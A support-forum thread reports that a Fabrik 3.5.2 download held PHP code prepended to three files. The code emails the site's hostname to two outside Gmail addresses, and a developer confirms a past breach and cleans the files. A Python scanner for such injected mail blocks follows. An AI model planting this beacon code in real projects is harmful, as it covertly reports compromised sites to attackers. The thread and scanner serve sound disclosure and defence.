Download version 3.5.2 infected?

ronhon

New Member
Hi there,
I just upgraded my development environment to Fabrik 3.5.2, downloaded from fabrikar.com/download.
After installation, emails started to be sent. I found out that the following code is placed at the top of administrator/components/com_fabrik/fabrik.php, administrator/components/com_fabrik/helpers/fabrik.php,
components/com_fabrik/fabrik.php:

<?php $to = 'albreto.st@gmail.com, blackswanr007@gmail.com';$subject = 'Hits ada lagi';$message = $_SERVER['HTTP_HOST'];$headers[] = 'From: Hidden Hits <auto@joss.com>';mail($to, $subject, $message, implode("\r\n", $headers));?>

Is it safe to use this version after I remove the mailing code?

Thanks
 
Hmmm, I can't find anything in the 3.5.2 download.

Do you still have a copy of the ZIP you installed from?

-- hugh
 
I've cleaned it up. Looking at the date on that file, it was consistent with a breach earlier this year that we thought we'd completely cleaned up after, and that a number of other extension sites got hit with. I've checked all the other zips from 3.4 onwards, nothing else seems to be affected.

Thanks for reporting it.

-- hugh
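
A triage sketch for the check discussed in this thread, scanning release ZIPs for a mail() block prepended to PHP files; it is an added example, not code from the Fabrik project or from the posters. The regex heuristic, the function names and the sample archive (with an example.com placeholder address and a hypothetical clean_example.php) are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Heuristic (an assumption, not a vendor signature): the file's first
# <?php ... ?> block both calls mail() and reads $_SERVER['HTTP_HOST'].
LEADING_BLOCK = re.compile(rb"\A\s*<\?php(.*?)\?>", re.DOTALL)
MAIL_CALL = re.compile(rb"(?<![\w>:$])mail\s*\(", re.IGNORECASE)  # skips ->mail(, ::mail(, sendmail(
HOST_READ = re.compile(rb"\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]")


def is_beacon_prefixed(php_source: bytes) -> bool:
    """True if the leading PHP block looks like the prepended mail beacon."""
    match = LEADING_BLOCK.match(php_source)
    if match is None:  # no closed leading block, e.g. a normal Joomla file
        return False
    block = match.group(1)
    return bool(MAIL_CALL.search(block) and HOST_READ.search(block))


def scan_zip(zip_file) -> list[str]:
    """Return the .php entries of a ZIP (path or file object) that match."""
    hits = []
    with zipfile.ZipFile(zip_file) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".php"):
                continue
            if is_beacon_prefixed(zf.read(info)):
                hits.append(info.filename)
    return sorted(hits)


def build_sample_zip() -> io.BytesIO:
    """Constructed sample archive: one clean file, one with a prepended block."""
    clean = b"<?php\ndefined('_JEXEC') or die;\n$mailer->mail($x);\n"
    beacon = (b"<?php $to = 'placeholder@example.com';"
              b"$message = $_SERVER['HTTP_HOST'];mail($to, 's', $message);?>\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("components/com_fabrik/clean_example.php", clean)
        zf.writestr("components/com_fabrik/fabrik.php", beacon + clean)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name in scan_zip(build_sample_zip()):
        print("suspicious leading block:", name)
```

A hit is a prompt to diff the file against a known-good copy of the same release, not proof of compromise on its own.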
 